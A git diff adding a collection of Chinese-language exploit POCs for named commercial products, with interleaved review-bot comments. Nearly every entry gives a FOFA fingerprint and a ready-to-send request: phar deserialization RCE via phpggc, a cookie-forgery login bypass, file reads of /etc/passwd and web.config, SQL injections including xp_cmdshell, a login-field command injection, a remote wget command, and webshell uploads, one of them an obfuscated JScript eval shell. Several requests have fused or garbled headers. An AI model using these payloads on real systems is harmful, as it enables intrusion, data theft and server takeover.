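Review bot: the imageupload request is internally inconsistent: the `Content-Type` header declares boundary `----WebKitFormBoundaryydBYM59rmMIhj0gw` while the body uses `------WebKitFormBoundary03rNBzFMIytvpWhy`, and two header pairs are fused (`Cache-Control: max-age=0Connection: keep-alive`, `Sec-Fetch-Site: noneUpgrade-Insecure-Requests: 1`). The `Cookie: PHPSESSID=...` and `/admin/` path confirm the 后台 in the title, so keep "authenticated" explicit in the description. In the setpassword hunk the claim that `/admin/controller/Login.php` resets the admin password to 123456 without any check is asserted but the `update` code is not quoted; cite it so the 后门 claim is verifiable.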
diff --git a/某U挖矿质押单语言系统后台phar反序列漏洞.md b/某U挖矿质押单语言系统后台phar反序列漏洞.md new file mode 100644 index 0000000..f112a70 --- /dev/null +++ b/某U挖矿质押单语言系统后台phar反序列漏洞.md @@ -0,0 +1,23 @@ +# 某U挖矿质押单语言系统后台phar反序列漏洞 + +**位于 /admin/controller/Cache.php 控制器的 deldir 方法存在file_exists 函数,该函数可以直接导致Phar反序列化漏洞触发** + +## fofa + +```javascript +"/static/index/css/login/framework7.ios.min.css" +``` + +## poc + +首先我们需要用phpggc生成一个绕过图片检测的phar反序列化脚本,用一张正常图片即可 + +``` +./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami +``` + +``` +/admin/cache/deldir?backup_file=phar://图片地址 +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281250731.webp) \ No newline at end of file diff --git a/某业务管理系统LoginUser存在信息泄露漏洞.md b/某业务管理系统LoginUser存在信息泄露漏洞.md new file mode 100644 index 0000000..f4c5405 --- /dev/null +++ b/某业务管理系统LoginUser存在信息泄露漏洞.md @@ -0,0 +1,34 @@ +# 某业务管理系统LoginUser存在信息泄露漏洞 + +某业务管理系统LoginUser存在信息泄露漏洞 + +## fofa + +```yaml +body="/Content/LayuiAdmin/login/css/index.css" +``` + +## poc + +``` +POST /Login/LoginUser HTTP/1.1 +Host: your-ip +Content-Length: 79 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive + +{"RecordID":"admin","password":"11111","undefined":"登录","language":"zh-CN"} +``` + +![image-20240821111211654](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408211112724.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/L9_i0oTvhkAAPu94YzAL4Q \ No newline at end of file diff --git a/某二开版海外抢单Shua单系统存在任意用户登录漏洞 2.md b/某二开版海外抢单Shua单系统存在任意用户登录漏洞 2.md new file mode 100644 index 0000000..4775bd0 --- /dev/null +++ b/某二开版海外抢单Shua单系统存在任意用户登录漏洞 2.md 
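Review bot: the phar hunk's `./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami` relies on one specific ThinkPHP gadget chain, so state the framework version the product ships, and note that `phar://图片地址` presupposes the image already sits on the server (the sibling imageupload entry), which makes this a post-auth chain. In the LoginUser hunk the `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` header is paired with a JSON body, and although the title says 信息泄露 the text never says what the response to `{"RecordID":"admin","password":"11111",...}` discloses; without that the POC reads as a failed login.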
@@ -0,0 +1,33 @@ +# 某二开版海外抢单Shua单系统存在任意用户登录漏洞 + +**位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器,来验证用户是否登录,然而这套系统实际采用两套验证用户的方法,Session和Cookie并存,其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键,如果Session中没有发现user_id,那么直接验证Cookie中的user_id,而Cookie是可以伪造的,这里导致漏洞产生。** + +## fofa + +```javascript +"/red/popper.min.js" +``` + +## poc + +```javascript +GET /index/index HTTP/1.1 +Accept: */* +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Length: 73 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: user_id=1 +Host: 127.0.0.1:81 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +User-Token-Csrf: csrf66e28d7ebbffaX-Requested-With: +``` + +![9eba17aa45f2b298e11a600cd389774d](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409131335933.jpg) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/wArXDFITAjeTG0IRA0B5rg \ No newline at end of file diff --git a/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md b/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md new file mode 100644 index 0000000..cc183de --- /dev/null +++ b/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md 
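Review bot: this file duplicates 某二开版海外抢单Shua单系统存在任意用户登录漏洞.md (same description, same request); keep one. In the request, `User-Token-Csrf: csrf66e28d7ebbffaX-Requested-With:` is two headers fused, and a GET carries `Content-Length: 73` with no body. The description already pins the root cause, `if (!$uid) { $uid = cookie('user_id'); }` falling back to a client-controlled cookie; the fix worth recording is that `user_id` must come only from the server-side session.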
@@ -0,0 +1,37 @@ +# 某二开版海外抢单Shua单系统存在任意用户登录漏洞 + +# 一、漏洞简介 +位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器,来验证用户是否登录,然而这套系统实际采用两套验证用户的方法,Session和Cookie并存,其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键,如果Session中没有发现user_id,那么直接验证Cookie中的user_id,而Cookie是可以伪造的,这里导致漏洞产生。 + +# 二、影响版本 ++ 海外刷单系统 + +# 三、资产测绘 ++ fofa`"/red/popper.min.js"` ++ 特征 + +![1726293548455-c7775462-88de-45a6-b23f-cf853d650096.png](./img/Gmllb7LmtIMFJzui/1726293548455-c7775462-88de-45a6-b23f-cf853d650096-992981.png) + +# 四、漏洞复现 +```plain +GET /index/index HTTP/1.1 +Accept: */* +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Length: 73 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: user_id=1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +User-Token-Csrf: csrf66e28d7ebbffaX-Requested-With: +``` + +![1726293582647-1b8a5655-677c-407b-8588-75ea40955731.png](./img/Gmllb7LmtIMFJzui/1726293582647-1b8a5655-677c-407b-8588-75ea40955731-643567.png) + +![1726293502362-d4828d91-dc9a-4000-94a6-0945d14bf7d3.png](./img/Gmllb7LmtIMFJzui/1726293502362-d4828d91-dc9a-4000-94a6-0945d14bf7d3-623870.png) + + + +> 更新: 2024-10-22 09:36:10 +> 原文: \ No newline at end of file diff --git a/某仿soul欲音社交系统存在任意文件读取漏洞.md b/某仿soul欲音社交系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..7ca7a8f --- /dev/null +++ b/某仿soul欲音社交系统存在任意文件读取漏洞.md 
@@ -0,0 +1,27 @@ +# 某仿soul欲音社交系统存在任意文件读取漏洞 + +位于 /application/api/controller/upload.php 控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件,然后输出base64编码后的文件. + +## fofa + +```javascript +"/public/style/admin/js/jquery.min.js" +``` + +## poc + +```php +GET /api/upload/tobase64?file=conn.php HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +``` + +![image-20240902103855273](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021038369.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/SuunBk1lnphYNgixyWegRg + diff --git a/某信景云终端安全管理系统存在loginSQL注入漏洞.md b/某信景云终端安全管理系统存在loginSQL注入漏洞.md new file mode 100644 index 0000000..5d1b5b6 --- /dev/null +++ b/某信景云终端安全管理系统存在loginSQL注入漏洞.md @@ -0,0 +1,6 @@ +## 某信景云终端安全管理系统 login SQL注入漏洞 +``` +POST /api/user/login + +captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)=' +``` diff --git a/某友时空KSOA-PayBill-SQL注入漏洞.md b/某友时空KSOA-PayBill-SQL注入漏洞.md new file mode 100644 index 0000000..a158cfc --- /dev/null +++ b/某友时空KSOA-PayBill-SQL注入漏洞.md @@ -0,0 +1,11 @@ +## 某友时空KSOA PayBill SQL注入漏洞 +``` +POST /servlet/PayBill?caculate&_rnd= HTTP/1.1 +Host: 1.1.1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 134 +Accept-Encoding: gzip, deflate +Connection: close + +11'WAITFOR DELAY '00:00:03';-1102360 +``` diff --git a/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md b/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md new file mode 100644 index 0000000..0b0d7f7 --- /dev/null +++ b/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md 
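Review bot: in the tobase64 hunk the `sec-ch-ua`, `sec-ch-ua-mobile` and `sec-ch-ua-platform` headers are fused into a single line. In the KSOA PayBill hunk `Content-Length: 134` does not match the far shorter body `11'WAITFOR DELAY '00:00:03';-1102360`, and the 某信景云 login entry is two lines with no description, fingerprint or expected response; at minimum say that the `sleep(3)` in `username` is a time-based check so the reader knows what to observe, and that the fix is parameterised queries in the login handler.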
@@ -0,0 +1,13 @@ +## 某和OA C6-GetSqlData.aspx SQL注入漏洞 +``` +OST /C6/Control/GetSqlData.aspx/.ashx +Host: ip:port +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 +Connection: close +Content-Length: 189 +Content-Type: text/plain +Accept-Encoding: gzip + +exec master..xp_cmdshell 'ipconfig' + +``` diff --git a/某微-E-Cology-某版本-SQL注入漏洞.md b/某微-E-Cology-某版本-SQL注入漏洞.md new file mode 100644 index 0000000..e881bee --- /dev/null +++ b/某微-E-Cology-某版本-SQL注入漏洞.md @@ -0,0 +1,23 @@ +## 某微 E-Cology 某版本 SQL注入漏洞 +``` +POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 +Content-Length: 191 +Accept-Encoding: gzip +Connection: close +Content-Type: text/plain + +callCount=1 +page= +httpSessionId= +scriptSessionId= +c0-scriptName=DocDwrUtil +c0-methodName=ifNewsCheckOutByCurrentUser +c0-id=0 +c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115 +c0-param1=string:1 +batchId=0 +``` +![3a380d7bbc888fb3314bb6b512b4e7db](https://github.com/wy876/POC/assets/139549762/6d40d284-0894-4c18-89dc-5a978d4f5c79) + diff --git a/某微E-Office9文件上传漏洞-CVE-2023-2523.md b/某微E-Office9文件上传漏洞-CVE-2023-2523.md new file mode 100644 index 0000000..86fa262 --- /dev/null +++ b/某微E-Office9文件上传漏洞-CVE-2023-2523.md 
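Review bot: the 某和OA GetSqlData.aspx request line reads `OST /C6/Control/GetSqlData.aspx/.ashx` with the method truncated and no HTTP version, and `Content-Length: 189` does not match the body. The body `exec master..xp_cmdshell 'ipconfig'` shows the endpoint runs caller-supplied SQL under a login that has `xp_cmdshell` available; the remediation to record is a least-privilege database account with `xp_cmdshell` disabled, in addition to removing the endpoint. In the E-Cology DWR hunk, `c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115` is a boolean check and the screenshot is the only evidence; add what differs between the true and false responses.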
@@ -0,0 +1,34 @@ +## 某微E-Office9文件上传漏洞 CVE-2023-2523 + +## fofa +``` +app="泛微-EOffice" +``` + +## poc +``` +POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 +Host: XXXX:XXX +Content-Length: 349 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 +Connection: close + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +Content-Disposition: form-data; name="upload_quwan"; filename="1.phP" +Content-Type: image/jpeg + + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt-- +``` diff --git a/某微E-Office9文件上传漏洞-CVE-2023-2648.md b/某微E-Office9文件上传漏洞-CVE-2023-2648.md new file mode 100644 index 0000000..94c95a6 --- /dev/null +++ b/某微E-Office9文件上传漏洞-CVE-2023-2648.md 
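Review bot: the request uploads `filename="1.phP"` with an empty body, and the hunk records neither the response nor the storage path, unlike the CVE-2023-2648 entry which gives `webshell路径`; add one or the other so the result can be checked. The mixed-case `.phP` is the whole point of the entry (a case-sensitive extension blacklist in front of a case-insensitive handler mapping), so name that as the root cause and note the fix: lowercase-normalise and allowlist the extension.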
@@ -0,0 +1,33 @@ +## 某微E-Office9文件上传漏洞 CVE-2023-2648 + +``` +POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 +Host: :8085 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 +Content-Length: 491 + +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 +Content-Disposition: form-data; name="Filedata"; filename="666.php" +Content-Type: application/octet-stream + + +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream + +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- +``` +![2070a628d476b95724b6b017a3430a45](https://github.com/wy876/POC/assets/139549762/ea43a9b8-d146-49ae-86ce-f28e5b15c185) + +webshell路径 +``` +http://10.211.55.3:8082/attachment/1727543347/666.php +``` diff --git a/某服-sxf-报表系统命令执行漏洞.md b/某服-sxf-报表系统命令执行漏洞.md new file mode 100644 index 0000000..ee5b339 --- /dev/null +++ b/某服-sxf-报表系统命令执行漏洞.md 
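Review bot: `Host: :8085` is missing the host, and the multipart body is malformed: the closing delimiter `--25d6...4b85--` appears right after the first part, then a second part and a second closing delimiter follow, so a strict parser stops at the first terminator. The `webshell路径` line `http://10.211.55.3:8082/attachment/1727543347/666.php` shows the file is stored under a timestamp directory with its original `.php` name kept; that is the root cause to state, and the fix is an allowlist on the extension plus a storage location the PHP handler does not execute.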
@@ -0,0 +1,18 @@ +## 某服 sxf-报表系统命令执行漏洞 +``` +POST /rep/login HTTP/1.1 +Host: URL +Cookie: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 +Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 +Accept-Encoding: gzip deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers +Connection: close +Content-Type:application/x-www-form-urlencoded +Content-Length: 126 + +clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq +``` diff --git a/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md b/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md new file mode 100644 index 0000000..78bc813 --- /dev/null +++ b/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md @@ -0,0 +1,9 @@ +## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞 +``` + +GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 +Host: 1.1.1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip, deflate +Connection: close +``` diff --git a/某盟-SAS堡垒机-漏洞.md b/某盟-SAS堡垒机-漏洞.md new file mode 100644 index 0000000..6dbeb96 --- /dev/null +++ b/某盟-SAS堡垒机-漏洞.md 
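Review bot: the sxf-报表 request headers look OCR-transcribed rather than captured (`Intel Mac 0s X 10.15: ry:109.0`, `g=0,9`, `Accept-Encoding: gzip deflate`, `Cache-Control: no-cache14 Te: trailers`, several headers per line); re-capture from a real request. The actual defect is in the body: `userID=admin%0Aid -a %0A` is a newline-separated shell command in the login field, i.e. command injection in `/rep/login`, which neither the title nor any description says. For the 某盟 local_user.php hunk, the traversal `cat=../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin` combines a file-inclusion primitive with a login-as-user function; say so, since the fix has to cover both.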
@@ -0,0 +1,29 @@ +## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞 +``` + +GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 +Host: 1.1.1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip, deflate +Connection: close +``` + +## 某盟 SAS堡垒机 GetFile 任意文件读取漏洞 +``` +GET /webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: 1.1.1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Connection: close +``` + +## 某盟 SAS堡垒机 Exec 远程命令执行漏洞 +``` +GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1 +Host: 1.1.1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Connection: close +``` diff --git a/某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md b/某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md new file mode 100644 index 0000000..958c412 --- /dev/null +++ b/某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md 
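Review bot: the first section of 某盟-SAS堡垒机-漏洞.md is a verbatim copy of 某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md; keep one. In the GetFile section the request line `GET /webconf/GetFile/indexpath=../../../../etc/passwd` has no `?` between path and query, unlike the sibling `GET /webconf/Exec/index?cmd=`, so the two should be made consistent. The Exec section's `cmd=wget%20xxx.xxx.xxx` is a placeholder and should be marked as one; the fix for all three is that `/webconf/` handlers must not be reachable unauthenticated.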
@@ -0,0 +1,30 @@ +# 某短视频系统视频知识付费系统存在前台任意文件读取漏洞 + +某短视频系统视频知识付费系统存在前台任意文件读取漏洞 + +## fofa + +```javascript +"testvideo://login?id=" +``` + +## poc + +```javascript +GET /index/index/request_by_curl?remote_server=file:///etc/passwd&post_string=1 HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112200410.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/e0IJDC4365lBu5XiWz93Gw \ No newline at end of file diff --git a/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md b/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md new file mode 100644 index 0000000..044f0af --- /dev/null +++ b/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md @@ -0,0 +1,32 @@ +## 某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 +``` +POST /?g=obj_app_upfile HTTP/1.1 +Host: x.x.x.x +Accept: / +Accept-Encoding: gzip, deflate +Content-Length: 574 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc +User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10000000 +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="upfile"; filename="vulntest.php" +Content-Type: text/plain + + + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="submit_post" + +obj_app_upfile +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="__hash__" + +0b9d6b1ab7479ab69d9f71b05e0e9445 +------WebKitFormBoundaryJpMyThWnAxbcBBQc-- + +马儿路径:attachements/xxx.php +``` 
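Review bot: the 短视频 entry's description only repeats the title; the request `request_by_curl?remote_server=file:///etc/passwd&post_string=1` shows the root cause is a curl fetch of a caller-supplied URL with the `file://` scheme allowed, so this is an SSRF that reaches local files and the fix is a scheme and host allowlist on `remote_server`. In the SecGate obj_app_upfile hunk, `Accept: /` has lost its `*/*`, the `__hash__` value `0b9d6b1ab7479ab69d9f71b05e0e9445` is given without saying whether it is constant across installs, and `马儿路径:attachements/xxx.php` sits inside the request fence instead of after it.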
diff --git a/某联达oa-后台文件上传漏洞.md b/某联达oa-后台文件上传漏洞.md new file mode 100644 index 0000000..08c25d2 --- /dev/null +++ b/某联达oa-后台文件上传漏洞.md @@ -0,0 +1,32 @@ +## 某联达oa 后台文件上传漏洞 +``` +POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 +Host: 10.10.10.1:8888 +X-Requested-With: Ext.basex +Accept: text/html, application/xhtml+xml, image/jxr, / +Accept-Language: zh-Hans-CN,zh-Hans;q=0.5 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj +Accept: / +Origin: http://10.10.10.1 +Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40 +Cookie: +Connection: close +Content-Length: 421 + +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; filename="1.aspx";filename="1.jpg" +Content-Type: application/text + +<%@ Page Language="Jscript" Debug=true%> +<% +var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'; +var GFMA=Request.Form("qmq1"); +var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1); +eval(GFMA, ONOQ); +%> + +------WebKitFormBoundaryFfJZ4PlAZBixjELj-- + +``` diff --git a/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md b/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md new file mode 100644 index 0000000..aa01e1e --- /dev/null +++ b/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md 
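Review bot: the line `Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"` has two `filename` parameters and no `name=`; say that the duplicate is deliberate (the extension check and the storage code read different ones) rather than leaving it to look like a typo, since that parser differential is the root cause. The blank `Cookie:` plus 后台 in the title mean an authenticated session is required, and `Accept` appears twice. The uploaded body is an obfuscated JScript `eval` shell; a marker page would prove the upload just as well.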
@@ -0,0 +1,49 @@ +# 正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞 + +正方软件股份有限公司移动信息服务管理平台存在任意文件上传漏洞。攻击者可通过任意文件上传获取服务器权限。 + +## fofa + +```yaml +title="移动信息服务管理" || body="URL=/zftal-mobile" +``` + +## poc + +```java +POST /zftal-mobile/oaMobile/oaMobile_fjUploadByType.html HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.1707.77 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW +Accept: */* +Content-Length: 457 + +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="yhm" + +123 +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="zid" + +456 +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="sign" + +789 +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="file"; filename="409.jsp" +Content-Type: text/plain + +111 +------WebKitFormBoundary7MA4YWxkTrZu0gW-- +``` + +文件路径 + +` /zftal-mobile/oaFjUploadByType/409.jsp` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/WrDhyx3wOdwMvSwkF-sXOQ \ No newline at end of file diff --git a/汇智ERPfilehandle存在任意文件读取漏洞.md b/汇智ERPfilehandle存在任意文件读取漏洞.md new file mode 100644 index 0000000..7a3f515 --- /dev/null +++ b/汇智ERPfilehandle存在任意文件读取漏洞.md 
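Review bot: the form carries `yhm=123`, `zid=456` and `sign=789`; `sign` suggests a request signature the server is supposed to verify, and if arbitrary values are accepted that is the real defect and should be stated. The returned path `/zftal-mobile/oaFjUploadByType/409.jsp` shows the original `.jsp` name is kept under the web root, so the fix to record is an extension allowlist together with a storage directory the servlet container does not execute.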
@@ -0,0 +1,41 @@ +# 汇智ERP filehandle存在任意文件读取漏洞 + +# 一、漏洞简介 +汇智ERP是一款由江阴汇智软件技术有限公司开发的企业资源规划(ERP)软件,旨在通过信息化手段帮助企业优化业务流程,提升管理效率,增强综合竞争力。适用于各类企业,包括大型企业、中小型企业以及集团化企业。根据企业规模和业务需求,汇智ERP提供了不同的版本(如集团版和标准版),以满足企业的个性化需求。汇智ERP filehandle存在任意文件读取漏洞 + +# 二、影响版本 ++ 汇智ERP + +# 三、资产测绘 ++ fofa`icon_hash="-642591392"` ++ 特征 + +![1721894686519-5cc4f9a9-8678-47d5-9542-2110734d50f0.png](./img/LRh-q9BuPwVokhJN/1721894686519-5cc4f9a9-8678-47d5-9542-2110734d50f0-978003.png) + +# 四、漏洞复现 +```plain +GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1721894837449-b25e1e44-568b-4cd8-8659-aa625a784dbd.png](./img/LRh-q9BuPwVokhJN/1721894837449-b25e1e44-568b-4cd8-8659-aa625a784dbd-669353.png) + +```plain +GET /nssys/common/filehandle.aspx?filepath=../../web.config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate 